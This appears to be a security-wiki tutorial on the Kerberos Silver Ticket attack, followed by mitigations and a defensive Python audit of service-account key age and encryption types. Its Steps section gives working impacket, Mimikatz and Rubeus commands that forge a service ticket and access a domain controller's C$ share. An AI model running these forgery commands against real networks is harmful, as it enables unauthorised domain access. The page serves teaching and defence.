# Silver Ticket Attack

### Overview

A Silver Ticket attack is a Kerberos service ticket forgery attack: with the long-term key of one service account, an attacker forges a service ticket for that specific service (such as CIFS, HTTP, MSSQL, or HOST) and authenticates to it directly, without ever contacting the domain controller.

Unlike a Golden Ticket attack, which forges a **Ticket Granting Ticket (TGT)** encrypted with the **KRBTGT** key, a Silver Ticket forges a **service ticket** (the ticket the Ticket Granting Service normally issues, often loosely called a TGS ticket) encrypted with the **long-term key of the target service account**: the NT hash when the ticket uses RC4, the AES key when it uses AES. For services that run under the computer account (CIFS, HOST, WSMAN, RPCSS and others) that key is the machine account's password hash. Because the service validates the ticket with its own key, the domain controller is **never involved** in authentication. The forged ticket's PAC carries no valid KRBTGT signature, so a service that performs PAC validation against the DC would reject it; services running as SYSTEM or with SeTcbPrivilege skip that validation by default, which is why the attack normally works.

{% hint style="info" %}
***Note**: The forged ticket still carries whatever user and group information we choose (for example a Domain Admin), but it only grants access to the one service whose key encrypted it. A ticket forged with the SQL service account's key cannot be used against some other service XYZ: XYZ decrypts tickets with its own key, so the forged ticket is unreadable to it. One stolen key gives one service; each additional service needs its own key and its own forged ticket.*
{% endhint %}

### Prerequisites

1. The attacker must have the NT hash (for an RC4 ticket) or the AES key (for an AES ticket) of the account that runs the target service. For CIFS/HOST this is the computer account's key; for a service such as MSSQL it is the dedicated service account, whose password is often recovered by Kerberoasting and then hashed.
2. The SPN of the service, the domain FQDN, the domain SID and the target hostname must be known. The domain SID is any domain account SID with its trailing RID removed.
3. The target must accept Kerberos authentication for that service.

### Steps

1. Identify the account that runs the target service (the computer account for CIFS/HOST, a user or gMSA for MSSQL/HTTP) and obtain its NT hash or AES key, for example from LSASS or SAM on a host you already control, via DCSync, or by cracking a Kerberoasted ticket and hashing the recovered password.
2. Create the Silver Ticket and use it:

   ```bash
   # LINUX (impacket): forge the ticket, then use it against the CIFS service on the DC.
   # -spn must name the exact service you will talk to; for CIFS/HOST the key is the
   # computer account's NT hash. Replace -nthash with -aesKey <AES256_KEY> when the
   # service uses AES (ticketer then emits an AES-encrypted ticket).
   impacket-ticketer \
     -nthash <SERVICE_ACCOUNT_NT_HASH> \
     -domain toffee.bth \
     -domain-sid S-1-5-21-1111111111-2222222222-3333333333 \
     -spn cifs/dc.toffee.bth \
     Administrator
   export KRB5CCNAME=Administrator.ccache   # ticketer writes <user>.ccache in the current directory
   smbclient -k -N //dc.toffee.bth/C$        # -N: no password prompt; Samba >= 4.15 prefers --use-kerberos=required

   # WINDOWS (Mimikatz): kerberos::golden with /service forges a service ticket, not a TGT;
   # /ptt injects it into the current logon session. The mimikatz console takes one line.
   kerberos::golden /domain:toffee.bth /sid:S-1-5-21-1111111111-2222222222-3333333333 /target:dc.toffee.bth /service:cifs /rc4:<SERVICE_ACCOUNT_NT_HASH> /user:Administrator /ptt
   klist                   # the forged ticket should now be listed for cifs/dc.toffee.bth
   dir \\dc.toffee.bth\C$

   # WINDOWS (Rubeus): same forgery and injection in one command.
   Rubeus.exe silver /service:cifs/dc.toffee.bth /rc4:<SERVICE_ACCOUNT_NT_HASH> /user:Administrator /domain:toffee.bth /sid:S-1-5-21-1111111111-2222222222-3333333333 /ptt
   klist                   # check that the ticket is cached
   dir \\dc.toffee.bth\C$
   ```

### Mitigations

1. Use strong, regularly rotated service account passwords. Prefer group Managed Service Accounts (gMSA), whose passwords rotate automatically, and keep automatic computer account password rotation enabled (every 30 days by default), because CIFS/HOST tickets are keyed to the machine account. A leaked key is useful exactly as long as it stays unchanged.
2. Minimize service account privileges. The forged ticket can claim any identity, but it only reaches the one service whose key was stolen; a service account that is not a local or domain administrator limits what that access is worth.
3. Enforce short ticket lifetimes (Kerberos policy "Maximum lifetime for service ticket"). Note the limit of this control: a forged ticket carries whatever lifetime the attacker chose and the service never asks the DC, so it mainly shortens the window for legitimately issued tickets that were stolen rather than forged.
4. Prefer AES over RC4 for Kerberos: set msDS-SupportedEncryptionTypes to AES128/AES256 only on service and computer accounts, so that tickets issued through the KDC no longer use the NT hash. On its own this does not stop a service from accepting an RC4 ticket while the account still holds an NT hash, so combine it with key rotation and PAC validation.
5. Make the service check the PAC and watch the host. Services running as SYSTEM or with SeTcbPrivilege skip PAC validation by default; where validation is enabled, the forged ticket's PAC has no valid KRBTGT signature and is rejected. Because the DC never sees a Silver Ticket (no 4768/4769 events), detection relies on the target host's 4624 logon events and on service tickets that have no matching issuance on any DC.
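Mitigations 1, 2 and 4 can be checked offline from directory attributes. The Python below is an added example, not the page's own code: it audits constructed records shaped like the LDAP attributes servicePrincipalName, pwdLastSet, msDS-SupportedEncryptionTypes and adminCount (in a real domain, feed it ldapsearch or Get-ADObject output) and flags accounts holding an SPN whose key has not rotated within the 30-day computer-account default, which still allow RC4/DES, or which sit in a protected admin group. Treating an unset msDS-SupportedEncryptionTypes as RC4-capable is an assumption, stated in the code.

```python
"""
Added example: offline audit of directory attributes for the mitigations above.

Accounts that hold an SPN are the ones a Silver Ticket can target, so for each
such account the audit flags: a key that has not rotated within MAX_AGE_DAYS
(30 days is the computer-account default), encryption types that still allow
RC4/DES, and membership in a protected admin group (adminCount=1).
Assumption: an unset/0 msDS-SupportedEncryptionTypes is treated as RC4-capable,
the safe reading for an audit. The records below are constructed; in a real
domain feed the same attributes from ldapsearch or Get-ADObject.
"""
from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags.
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128, AES256 = 1, 2, 4, 8, 16
_ENC_NAMES = {DES_CBC_CRC: "DES_CBC_CRC", DES_CBC_MD5: "DES_CBC_MD5",
              RC4_HMAC: "RC4_HMAC", AES128: "AES128", AES256: "AES256"}
WEAK = DES_CBC_CRC | DES_CBC_MD5 | RC4_HMAC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, exact to the microsecond."""
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def enc_types(value) -> set:
    """Decode the bitmask into etype names; None/0 decodes to an empty set."""
    value = value or 0
    return {name for bit, name in _ENC_NAMES.items() if value & bit}


def audit(accounts, now, max_age_days=30):
    """Return (sAMAccountName, finding) pairs for every Silver-Ticket-relevant weakness."""
    findings = []
    for acct in accounts:
        if not acct.get("servicePrincipalName"):
            continue                         # no SPN: nothing to forge a ticket for
        name = acct["sAMAccountName"]
        age = now - filetime_to_datetime(acct["pwdLastSet"])
        if age > timedelta(days=max_age_days):
            findings.append((name, f"key unchanged for {age.days} days; a leaked hash stays valid"))
        value = acct.get("msDS-SupportedEncryptionTypes") or 0
        if value == 0:
            findings.append((name, "msDS-SupportedEncryptionTypes unset: RC4 allowed by default (assumed)"))
        elif value & WEAK:
            weak = sorted(n for b, n in _ENC_NAMES.items() if value & b & WEAK)
            findings.append((name, f"weak etypes still enabled: {weak}"))
        if acct.get("adminCount") == 1:
            findings.append((name, "adminCount=1: service account is in a protected admin group"))
    return findings


# Constructed sample records (not real directory data).
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_mssql", "servicePrincipalName": ["MSSQLSvc/sql01.toffee.bth:1433"],
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=900)),
     "msDS-SupportedEncryptionTypes": None, "adminCount": 1},
    {"sAMAccountName": "gmsa_web$", "servicePrincipalName": ["HTTP/web01.toffee.bth"],
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=5)),
     "msDS-SupportedEncryptionTypes": AES128 | AES256},
    {"sAMAccountName": "DC$", "servicePrincipalName": ["cifs/dc.toffee.bth", "HOST/dc.toffee.bth"],
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=12)),
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128 | AES256},
    {"sAMAccountName": "jdoe", "servicePrincipalName": [],
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=400))},
]

if __name__ == "__main__":
    for name, finding in audit(SAMPLE_ACCOUNTS, NOW):
        print(f"{name:12} {finding}")
```

The gMSA with AES-only etypes and a fresh key produces no finding, the stale RC4 SQL account produces three, and the domain controller is flagged only for still allowing RC4 on its CIFS/HOST services.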
